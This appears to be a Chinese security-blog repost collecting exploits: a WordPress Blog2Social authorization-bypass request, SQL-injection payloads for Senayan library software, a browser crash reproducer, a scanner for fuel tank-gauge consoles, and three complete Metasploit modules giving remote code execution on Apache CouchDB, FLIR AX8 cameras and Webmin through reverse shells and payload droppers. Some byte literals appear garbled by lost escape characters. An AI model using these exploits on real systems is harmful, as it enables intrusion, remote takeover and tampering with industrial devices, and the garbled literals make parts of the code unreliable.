免责声明
1.WordPress Blog2Social 6.9.11 缺少授权漏洞(CVE-2022-3622)
受影响的版本:<=6.9.11
/wp-admin/admin.php?page=blog2social-settings
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
Cookie: b2s_og_default_title=SiteTitle&b2s_og_default_desc=Just%20another%20WordPress%20site&b2s_og_default_image=&b2s_og_imagedata_active=1&b2s_og_objecttype_active=1&b2s_og_locale_active=1&b2s_og_locale=en_US&b2s_card_default_type=Summary&b2s_card_default_title=SiteTitle&b2s_card_default_desc=Just%20another%20WordPress%20site&b2s_card_default_image=&is_admin=1&version=0&action=b2s_save_social_meta_tags&b2s_security_nonce=<nonce>
2.Senayan图书馆管理系统9.5.0 SQL注入漏洞
Parameter: keywords (GET)
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')));SELECT
SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)
Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')))
RLIKE (SELECT 9971 FROM (SELECT(SLEEP(5)))bdiv)#
<script>
  // Entry point, wired to <body onload> below. Registers a DOMNodeRemoved
  // mutation listener and then moves the <glyph> into the <altGlyph>; that
  // DOM change is what starts the callbacks handled by eventhandler3.
  // svgvar00024 / svgvar00021 / selectElement resolve through the browser's
  // id-to-global mapping of the elements declared in the body.
  function jsfuzzer() {
    window.addEventListener("DOMNodeRemoved", eventhandler3);
    svgvar00024.append(svgvar00021);
  }

  // Number of DOMNodeRemoved callbacks seen so far; the listener removes
  // itself once this exceeds 1, so the body below runs a bounded number of times.
  var i = 0;

  // Mutation-event callback. Mutates the DOM again from inside DOMNodeRemoved
  // dispatch: wraps the <select> in a freshly created Range, then sets its
  // option count to 2. The {1}/{2}/{3} markers are the author's labels for the
  // steps of the reproducer; the generated-looking identifiers suggest a
  // minimised DOM-fuzzer test case rather than hand-written code.
  function eventhandler3() {
    i++;
    if (i > 1) { window.removeEventListener("DOMNodeRemoved", eventhandler3); }
    var var00001 = document.createRange();
    // Exceptions from surroundContents are deliberately ignored.
    try { var00001.surroundContents(selectElement); } catch(e) { } // {1}
    selectElement.length = 2; // {2}
    // {3} - Need 1 of these 2 lines
    console.log(selectElement.length);
    //var var00170 = selectElement.item(1%selectElement.length);
  }
</script>
<!-- Minimal DOM for the reproducer: the SVG children moved by jsfuzzer and the
     <select> manipulated by eventhandler3. -->
<body onload=jsfuzzer()>
<svg id="svgvar00001" >
<glyph id="svgvar00021"/>
<altGlyph id="svgvar00024"/>
</svg>
<select id="selectElement">a</select>
#!/usr/bin/env python3
import time
import socket
# Flat scan script: reads one host per line from /tmp/ATG_SCAN.txt, opens a TCP
# connection to port 10001 on each, sends a fixed probe and appends the hosts
# whose reply contains 'IN-TANK INVENTORY' to /tmp/ATG_DEVICES.txt.
# "ATG" is not expanded anywhere in the script; the probe and marker strings are
# consistent with an automatic-tank-gauge console query, but confirm against the
# original source.
# NOTE(review): the probe literal ('x01' ... 'n') and the output line
# ("t ->t ... n") read as plain characters as printed here; escape backslashes
# appear to have been lost in extraction, so the bytes shown are not necessarily
# what the original script sent or wrote.
with open("/tmp/ATG_SCAN.txt",'r') as atg_file:
    for line in atg_file.read().splitlines():
        try:
            atg_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            port = 10001
            search_str = 'IN-TANK INVENTORY'
            msg = str('x01' + 'I20100' + 'n').encode('ascii')
            # No connect timeout is set; an unresponsive host blocks the scan
            # until the OS-level timeout fires.
            atg_socket.connect((line, port))
            atg_socket.send(msg)
            time.sleep(.25)
            # Single 1024-byte read; the marker must fall within that first chunk.
            response = atg_socket.recv(1024).decode()
            if search_str in response:
                with open("/tmp/ATG_DEVICES.txt", 'a') as file2:
                    file2.write(line + "t ->tATG Devicen")
            else:
                # `continue` skips the close() below, so sockets of
                # non-matching hosts are left to the garbage collector.
                continue
            atg_socket.close()
        except:
            # Bare except: every error for this host (connection refused,
            # timeout, decode error, and also KeyboardInterrupt) is silently
            # dropped and the scan moves to the next line.
            pass
# Redundant: the with-statement above has already closed the file.
atg_file.close()
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit exploit module for CVE-2022-24706 (Apache CouchDB < 3.2.2): an
# Erlang node reachable through EPMD accepts the default distribution cookie
# 'monster', after which the module pushes a command to the node over the
# distribution channel. Both the EPMD query (default RPORT 4369) and the node
# handshake are plain TCP exchanges, i.e. observable on the wire.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Retry
  include Msf::Exploit::Powershell
  # AutoCheck runs #check ahead of #exploit; that is how @vulnerable_socket
  # (assigned in #check) is already populated when #exploit starts.
  prepend Msf::Exploit::Remote::AutoCheck

  require 'msf/core/exploit/powershell'
  require 'digest'

  # Constants required for communicating over the Erlang protocol defined here:
  # https://www.erlang.org/doc/apps/erts/erl_dist_protocol.html
  # NOTE(review): as printed on this page the literals below contain the plain
  # characters "x00", "x01", ... rather than byte escapes; the backslashes appear
  # to have been lost in extraction. Compare against the upstream module before
  # treating any of them as exact wire bytes. The same applies to the regexp in
  # #get_erlang_ports and the string literals in #connect_to_erlang_server and
  # #compile_cmd.
  EPM_NAME_CMD = "x00x01x6e".freeze
  NAME_MSG = "x00x15nx00x07x00x03x49x9cAAAAAA@AAAAAAA".freeze
  # Frozen; #connect_to_erlang_server uses a mutable local copy instead.
  CHALLENGE_REPLY = "x00x15rx01x02x03x04".freeze
  CTRL_DATA = "x83hx04ax06gwx0eAAAAAA@AAAAAAAx00x00x00x03x00x00x00x00x00wx00wx03rex".freeze
  # Default Erlang cookie of the affected installations (see 'Description').
  COOKIE = 'monster'.freeze
  COMMAND_PREFIX = "x83hx02gwx0eAAAAAA@AAAAAAAx00x00x00x03x00x00x00x00x00hx05wx04callwx02oswx03cmdlx00x00x00x01k".freeze

  # Module metadata. The payload 'MaxSize' is bounded by the 16-bit length field
  # written in #compile_cmd; RPORT defaults to the EPMD port.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apache Couchdb Erlang RCE',
        'Description' => %q{
          In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without
          authenticating and gain admin privileges.
        },
        'Author' => [
          'Milton Valencia (wetw0rk)', # Erlang Cookie RCE discovery
          '1F98D', # Erlang Cookie RCE exploit
          'Konstantin Burov', # Apache CouchDB Erlang Cookie exploit
          '_sadshade', # Apache CouchDB Erlang Cookie exploit
          'jheysel-r7', # Msf Module
        ],
        'References' => [
          [ 'EDB', '49418' ],
          [ 'URL', 'https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit'],
          [ 'CVE', '2022-24706'],
        ],
        'License' => MSF_LICENSE,
        'Platform' => ['win', 'linux'],
        'Payload' => {
          'MaxSize' => 60000 # Due to the 16-bit nature of the cmd in the compile_cmd method
        },
        'Privileged' => false,
        'Arch' => [ ARCH_CMD ],
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_openssl'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => :wget,
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x86/meterpreter_reverse_tcp'
              }
            }
          ],
          [
            'Windows Command',
            {
              'Platform' => 'win',
              'Arch' => ARCH_CMD,
              'Type' => :win_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
              }
            }
          ],
          [
            'Windows Dropper',
            {
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :win_dropper,
              'CmdStagerFlavor' => :certutil,
              'DefaultOptions' => {
                'PAYLOAD' => 'windows/x64/meterpreter_reverse_tcp'
              }
            }
          ],
          [
            'PowerShell Stager',
            {
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :psh_stager,
              'CmdStagerFlavor' => :certutil,
              'DefaultOptions' => {
                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2022-01-21',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      ),
    )
    register_options(
      [
        Opt::RPORT(4369)
      ]
    )
  end

  # Vulnerability check: enumerate Erlang node ports via EPMD, then try the
  # default-cookie handshake against each one.
  #
  # Side effect: on success the authenticated socket is kept in
  # @vulnerable_socket so #exploit can reuse it instead of reconnecting.
  #
  # @return [Exploit::CheckCode] Safe, or Vulnerable with the socket retained
  def check
    erlang_ports = get_erlang_ports
    # If get_erlang_ports does not return an array of port numbers, the target is not vulnerable.
    return Exploit::CheckCode::Safe('This endpoint does not appear to expose any erlang ports') if erlang_ports.empty?

    erlang_ports.each do |erlang_port|
      # If connect_to_erlang_server returns a socket, it means authentication with the default cookie has been
      # successful and the target as well as the specific socket used in this instance is vulnerable
      sock = connect_to_erlang_server(erlang_port.to_i)
      # connect_to_erlang_server returns nil on every failure path; the exact
      # class test (presumably the Rex socket is a ::Socket instance) is what
      # separates the two outcomes here.
      if sock.instance_of?(Socket)
        @vulnerable_socket = sock
        return Exploit::CheckCode::Vulnerable('Successfully connected to the Erlang Server with cookie: "monster"')
      else
        next
      end
    end
    # Reached only when every reported port rejected the default cookie.
    Exploit::CheckCode::Safe('This endpoint has an exposed erlang port(s) but appears to be a patched')
  end

  # Connect to the Erlang Port Mapper Daemon to collect port numbers of running Erlang servers
  #
  # Uses RHOSTS/RPORT from the datastore (RPORT defaults to 4369) and the
  # 'WfsDelay' option as the wait before reading the reply.
  #
  # @return [Array] An array of port numbers for discovered Erlang Servers.
  #   Always an Array; empty when no node named "couchdb" is reported or the
  #   connection fails.
  def get_erlang_ports
    erlang_ports = []
    begin
      print_status("Attempting to connect to the Erlang Port Mapper Daemon (EDPM) socket at: #{datastore['RHOSTS']}:#{datastore['RPORT']}...")
      # connect(true, ...) from the Tcp mixin stores the connection in `sock`,
      # which is what the put/get_once calls below operate on.
      connect(true, { 'RHOST' => datastore['RHOSTS'], 'RPORT' => datastore['RPORT'] })
      # request Erlang nodes
      sock.put(EPM_NAME_CMD)
      sleep datastore['WfsDelay']
      res = sock.get_once
      unless res && res.include?("x00x00x11x11name couchdb")
        print_error('Did not find any Erlang nodes')
        return erlang_ports
      end
      print_status('Successfully found EDPM socket')
      # [0] is the whole match, not the capture group. A line that does not
      # match yields nil here and nil[0] raises NoMethodError, which the rescue
      # below does not cover.
      res.each_line do |line|
        erlang_ports << line.match(/s(d+$)/)[0]
      end
    rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET => e
      print_error("Error connecting to EDPM: #{e.class} #{e}")
      disconnect
      return erlang_ports
    end
    erlang_ports
  end

  # Attempts to connect to an erlang server with a default erlang cookie of 'monster', which is the
  # default erlang cookie value in Apache CouchDB installations before 3.2.2
  #
  # @param erlang_port [Integer] node port reported by EPMD (see #get_erlang_ports)
  # @return [Socket] Returns a socket that is connected and already authenticated to the vulnerable Apache CouchDB Erlang Server
  # @return [nil] when the handshake does not complete or the connection raises
  def connect_to_erlang_server(erlang_port)
    print_status('Attempting to connect to the Erlang Server with an Erlang Server Cookie value of "monster" (default in vulnerable instances of Apache CouchDB)...')
    connect(true, { 'RHOST' => datastore['RHOSTS'], 'RPORT' => erlang_port })
    print_status('Connection successful')
    # Retry mixin: the block is re-run (resending NAME_MSG each time) until it
    # returns something truthy or the 60 s timeout expires.
    challenge = retry_until_truthy(timeout: 60) do
      sock.put(NAME_MSG)
      sock.get_once(5) # ok message
      sock.get_once
    end
    # The expected successful response from the target should start with x00x1C
    unless challenge && challenge.include?("x00x1C")
      print_error('Connecting to the Erlang server was unsuccessful')
      return
    end
    # Big-endian 32-bit challenge value taken from bytes 9..12 of the reply.
    challenge = challenge[9..12].unpack('N*')[0]
    # Mutable copy of CHALLENGE_REPLY: `<<` below appends to it, which the
    # frozen constant would not allow.
    challenge_reply = "x00x15rx01x02x03x04"
    md5 = Digest::MD5.new
    # Digest input is the cookie followed by the challenge in decimal form.
    md5.update(COOKIE + challenge.to_s)
    challenge_reply << [md5.hexdigest].pack('H*')
    sock.put(challenge_reply)
    sleep datastore['WfsDelay']
    # Any reply at all is taken as acceptance; only a nil read counts as failure.
    challenge_response = sock.get_once
    if challenge_response.nil?
      print_error('Authentication was unsuccessful')
      return
    end
    print_status('Erlang challenge and response completed successfully')
    sock
  # Method-level rescue: covers every statement above, including connect.
  rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET => e
    print_error("Error when connecting to Erlang Server: #{e.class} #{e} ")
    disconnect
    return
  end

  # Wraps a command string in the pre-built message structure (COMMAND_PREFIX,
  # CTRL_DATA) and frames it with a total-length prefix.
  #
  # @param cmd [String] command to be carried in the message
  # @return [String] 4-byte big-endian length followed by the message body
  def compile_cmd(cmd)
    msg = ''
    msg << COMMAND_PREFIX
    # 16-bit big-endian length field: the reason for the 60000-byte payload
    # 'MaxSize' in #initialize.
    msg << [cmd.length].pack('S>')
    msg << cmd
    msg << "jwx04user"
    payload = ("x70" + CTRL_DATA + msg)
    ([payload.size].pack('N*') + payload)
  end

  # Sends one compiled command over an already authenticated socket.
  # Also serves as the CmdStager callback (see #exploit_socket), which is why
  # the socket travels in opts[:sock].
  #
  # @param cmd [String] command to send
  # @param opts [Hash] must contain :sock, the socket returned by #connect_to_erlang_server
  # @return [void]
  def execute_command(cmd, opts = {})
    payload = compile_cmd(cmd)
    print_status('Sending payload... ')
    opts[:sock].put(payload)
    sleep datastore['WfsDelay']
  end

  # Dispatches on the selected target's 'Type' and delivers the payload over
  # the given socket.
  #
  # @param sock [Socket] authenticated Erlang socket
  # @return [void]
  # @raise fail_with(Failure::BadConfig) for an unknown target type
  def exploit_socket(sock)
    case target['Type']
    when :unix_cmd, :win_cmd
      execute_command(payload.encoded, { sock: sock })
    when :linux_dropper, :win_dropper
      execute_cmdstager({ sock: sock })
    when :psh_stager
      execute_command(cmd_psh_payload(payload.encoded, payload_instance.arch.first), { sock: sock })
    else
      fail_with(Failure::BadConfig, 'Invalid target specified')
    end
  end

  # Main entry point. Reuses the socket found by #check when present; otherwise
  # repeats the EPMD enumeration and handshake and exploits every port that
  # accepts the default cookie.
  #
  # @return [void]
  def exploit
    # If the check method has already been run, use the vulnerable socket that has already been identified
    if @vulnerable_socket
      exploit_socket(@vulnerable_socket)
    else
      erlang_ports = get_erlang_ports
      # get_erlang_ports always returns an Array (possibly empty), so this guard
      # cannot fire; an empty list simply makes the loop below a no-op.
      fail_with(Failure::BadConfig, 'This endpoint does not appear to expose any erlang ports') unless erlang_ports.instance_of?(Array)
      erlang_ports.each do |erlang_port|
        sock = connect_to_erlang_server(erlang_port.to_i)
        next unless sock.instance_of?(Socket)
        exploit_socket(sock)
      end
    end
  end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/stopwatch'
# Metasploit exploit module for CVE-2022-37061 (FLIR AX8 <= 1.46.16): command
# injection through the `id` POST parameter of res.php, executed as root.
# Every request goes to the same endpoint with action=alarm, which is the
# request shape a defender would look for in web logs.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  # Runs #check before #exploit.
  prepend Msf::Exploit::Remote::AutoCheck

  # Module metadata; RPORT defaults to 80 with SSL off.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'FLIR AX8 unauthenticated RCE',
        'Description' => %q{
          All FLIR AX8 thermal sensor cameras versions up to and including 1.46.16 are vulnerable to Remote Command Injection.
          This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter
          in the res.php endpoint.
          This module uses the vulnerability to upload and execute payloads gaining root privileges.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Thomas Knudsen (https://www.linkedin.com/in/thomasjknudsen)', # Security researcher
          'Samy Younsi (https://www.linkedin.com/in/samy-younsi)', # Security researcher
          'h00die-gr3y' # metasploit module
        ],
        'References' => [
          ['CVE', '2022-37061'],
          ['PACKETSTORM', '168114'],
          ['URL', 'https://attackerkb.com/topics/UAZaDsQBfx/cve-2022-37061'],
        ],
        'DisclosureDate' => '2022-08-19',
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD, ARCH_ARMLE],
        'Privileged' => true,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_netcat'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_ARMLE],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => [ 'curl', 'printf' ],
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 80,
          'SSL' => false
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )
  end

  # Sends one command through the injection point: `id` is set to a random
  # number, a `;` separator and the command. Used by #check, by #exploit and by
  # the CmdStager mixin (hence the unused second parameter).
  #
  # @param cmd [String] command to inject
  # @param _opts [Hash] ignored; present for the CmdStager callback signature
  # @return [Rex::Proto::Http::Response, nil] the response, or nil when the request raised
  def execute_command(cmd, _opts = {})
    action_id = rand(1..40)
    return send_request_cgi({
      'method' => 'POST',
      'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
      'uri' => normalize_uri(target_uri.path, 'res.php'),
      'vars_post' => {
        'action' => 'alarm',
        'id' => "#{action_id};#{cmd}"
      }
    })
  # Method-level rescue: any StandardError from the request is logged and
  # turned into a nil return rather than propagated.
  rescue StandardError => e
    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
    print_error("Communication error occurred: #{e.message}")
    return nil
  end

  # Checking if the target is vulnerable by executing a randomized sleep to test the remote code execution
  #
  # Timing-based: the request is wrapped in Rex::Stopwatch and the target is
  # reported Vulnerable only when the round trip took at least the requested
  # number of seconds. A nil response (request raised) yields Unknown.
  #
  # @return [Exploit::CheckCode]
  def check
    print_status("Checking if #{peer} can be exploited!")
    sleep_time = rand(5..10)
    print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")
    # elapsed_time yields [block result, seconds elapsed].
    res, elapsed_time = Rex::Stopwatch.elapsed_time do
      execute_command("sleep #{sleep_time}")
    end
    return Exploit::CheckCode::Unknown('No response received from the target!') unless res

    print_status("Elapsed time: #{elapsed_time} seconds.")
    return CheckCode::Safe('Failed to test command injection.') unless elapsed_time >= sleep_time

    CheckCode::Vulnerable('Successfully tested command injection.')
  end

  # Main entry point: sends the encoded command payload directly, or hands off
  # to the CmdStager for the dropper target. Other target types fall through
  # silently (no else branch).
  #
  # @return [void]
  def exploit
    case target['Type']
    when :unix_cmd
      print_status("Executing #{target.name} with #{payload.encoded}")
      execute_command(payload.encoded)
    when :linux_dropper
      print_status("Executing #{target.name}")
      execute_cmdstager
    end
  end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit exploit module for CVE-2022-0824 (Webmin 1.984): an authenticated
# low-privilege user can reach File Manager functions they are not entitled to.
# The module chains three of them - http_download.cgi (fetch a file from a URL
# into /usr/share/webmin), chmod.cgi (make it 0755) and a GET of the dropped
# .cgi - so those three requests, with module=filemin, from an account that
# lacks File Manager rights are the log trail to look for. The dropped file is
# /usr/share/webmin/<resource>.cgi and is registered for cleanup.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HttpClient
  # HttpServer: the module hosts the payload itself (see #on_request_uri).
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::Remote::HTTP::Webmin
  prepend Msf::Exploit::Remote::AutoCheck

  # Module metadata and options: RPORT defaults to 10000; USERNAME and PASSWORD
  # are required but default to empty strings.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Webmin File Manager RCE',
        'Description' => %q{
          In Webmin version 1.984, any authenticated low privilege user without access rights to
          the File Manager module could interact with file manager functionalities such as downloading files from remote URLs and
          changing file permissions. It is possible to achieve Remote Code Execution via a crafted .cgi file by chaining those
          functionalities in the file manager.
        },
        'Author' => [
          'faisalfs10x', # discovery
          'jheysel-r7' # module
        ],
        'References' => [
          [ 'URL', 'https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/'], # exploit
          [ 'URL', 'https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell'], # exploit
          [ 'CVE', '2022-0824']
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'linux',
        'Privileged' => true,
        'Targets' => [
          [
            'Automatic (Unix In-Memory)',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_memory,
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2022-02-26',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )
    register_options(
      [
        OptPort.new('RPORT', [true, 'The default webmin port', 10000]),
        OptString.new('USERNAME', [ true, 'The username to authenticate as', '' ]),
        OptString.new('PASSWORD', [ true, 'The password for the specified username', '' ])
      ]
    )
  end

  # Version-based check delegated to the Webmin mixin; the two arguments are
  # presumably the lower/upper version bounds ('1.984' matches the Description).
  #
  # @return [Exploit::CheckCode]
  def check
    webmin_check('0', '1.984')
  end

  # Authenticates with the configured USERNAME/PASSWORD via the Webmin mixin.
  #
  # @return [String] session cookie; #exploit treats an empty string as failure
  def login
    webmin_login(datastore['USERNAME'], datastore['PASSWORD'])
  end

  # Asks the File Manager's http_download.cgi to fetch "<get_uri>.cgi" from
  # this module's own HTTP server into /usr/share/webmin. The session cookie
  # from #login is reused via 'keep_cookies'. The request body is assembled by
  # string concatenation rather than 'vars_post'.
  #
  # @return [void]
  # @raise fail_with(Failure::UnexpectedReply) when no response arrives
  # @raise fail_with(Failure::BadConfig) when Webmin reports the URL as invalid
  def download_remote_url
    print_status('Fetching payload from HTTP server')
    res = send_request_cgi({
      'uri' => normalize_uri(datastore['TARGETURI'], '/extensions/file-manager/http_download.cgi'),
      'method' => 'POST',
      'keep_cookies' => true,
      'data' => 'link=' + get_uri + '.cgi' + '&username=&password=&path=%2Fusr%2Fshare%2Fwebmin',
      'headers' => {
        'Accept' => 'application/json, text/javascript, */*; q=0.01',
        'Accept-Encoding' => 'gzip, deflate',
        'Content-Type' => 'application/x-www-form-urlencoded; charset=UTF-8',
        'X-Requested-With' => 'XMLHttpRequest',
        'Referer' => 'http://' + datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + '/filemin/?xnavigation=1'
      },
      'vars_get' => {
        'module' => 'filemin'
      }
    })
    fail_with(Failure::UnexpectedReply, 'Unable to download .cgi payload from http server') unless res
    fail_with(Failure::BadConfig, 'please properly configure the http server, it could not be found by webmin') if res.body.include?('Error: No valid URL supplied!')
    # FileDropper removes the dropped file when the session is cleaned up.
    register_file_for_cleanup("/usr/share/webmin/#{@file_name}")
  end

  # Calls chmod.cgi to set the dropped file to 0755 (mode 'applyto' => '1').
  # Success is judged solely by a 302 status.
  #
  # @return [void]
  # @raise fail_with(Failure::UnexpectedReply) unless the response is a 302
  def modify_permissions
    print_status('Modifying the permissions of the uploaded payload to 0755')
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/extensions/file-manager/chmod.cgi'),
      'method' => 'POST',
      'keep_cookies' => true,
      'headers' => {
        'Referer' => 'http://' + datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + 'filemin/?xnavigation=1'
      },
      'vars_get' => {
        'module' => 'filemin',
        'page' => '1',
        'paginate' => '30'
      },
      'vars_post' => {
        'name' => @file_name,
        'perms' => '0755',
        'applyto' => '1',
        'path' => '/usr/share/webmin'
      }
    })
    fail_with(Failure::UnexpectedReply, 'Unable to modify permissions on the upload .cgi payload') unless res && res.code == 302
  end

  # Requests the dropped .cgi so Webmin executes it. A 500 is treated as
  # success - presumably because the payload does not emit a valid CGI
  # response header.
  #
  # @return [void]
  # @raise fail_with(Failure::UnexpectedReply) unless the response is a 500
  def exec_revshell
    res = send_request_cgi(
      'method' => 'GET',
      'keep_cookies' => true,
      'uri' => normalize_uri(datastore['TARGETURI'], @file_name),
      'headers' => {
        'Connection' => 'keep-alive'
      }
    )
    fail_with(Failure::UnexpectedReply, 'Unable to execute the .cgi payload') unless res && res.code == 500
  end

  # HttpServer callback: answers any request to the served resource with the
  # encoded payload as an octet-stream. This is what Webmin's http_download.cgi
  # fetches in #download_remote_url.
  #
  # @param cli [Rex::Proto::Http::ServerClient] requesting client
  # @param request [Rex::Proto::Http::Request] incoming request
  # @return [void]
  def on_request_uri(cli, request)
    print_status("Request '#{request.method} #{request.uri}'")
    print_status('Sending payload ...')
    send_response(cli, payload.encoded,
                  'Content-Type' => 'application/octet-stream')
  end

  # Main entry point: start the payload server, derive the dropped file name
  # from the served resource path, log in, then run the download / chmod /
  # execute chain in order.
  #
  # @return [void]
  # @raise fail_with(Failure::BadConfig) when login returns an empty cookie
  def exploit
    start_service
    # Resource path minus slashes, plus '.cgi' - also the name registered for cleanup.
    @file_name = (get_resource.gsub('/', '') + '.cgi')
    cookie = login
    fail_with(Failure::BadConfig, 'Unsuccessful login attempt with creds') if cookie.empty?

    print_status('Downloading remote url')
    download_remote_url
    print_status('Finished downloading remote url')
    modify_permissions
    exec_revshell
  end
end
原文始发于微信公众号(Hack All):【漏洞仓库】0day Today Team最近发布的Poc&Exp
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。